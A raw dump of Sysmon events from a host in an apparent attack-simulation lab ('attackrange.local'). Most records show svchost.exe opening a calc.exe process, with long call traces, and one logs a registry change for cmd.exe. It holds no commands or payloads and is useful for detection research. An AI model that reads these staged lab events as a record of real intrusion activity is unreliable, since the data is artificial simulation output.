22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362136Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362135Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362134Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362133Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362132Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362131Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362130Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362129Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362128Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362127Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362126Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362125Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 13241300x8000000000000000362124Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:13:28.585{8e433fbf-3708-6013-ba03-000000001100}7360C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000362123Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362122Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362121Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362120Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362119Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362118Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362117Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362116Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.585{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362115Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 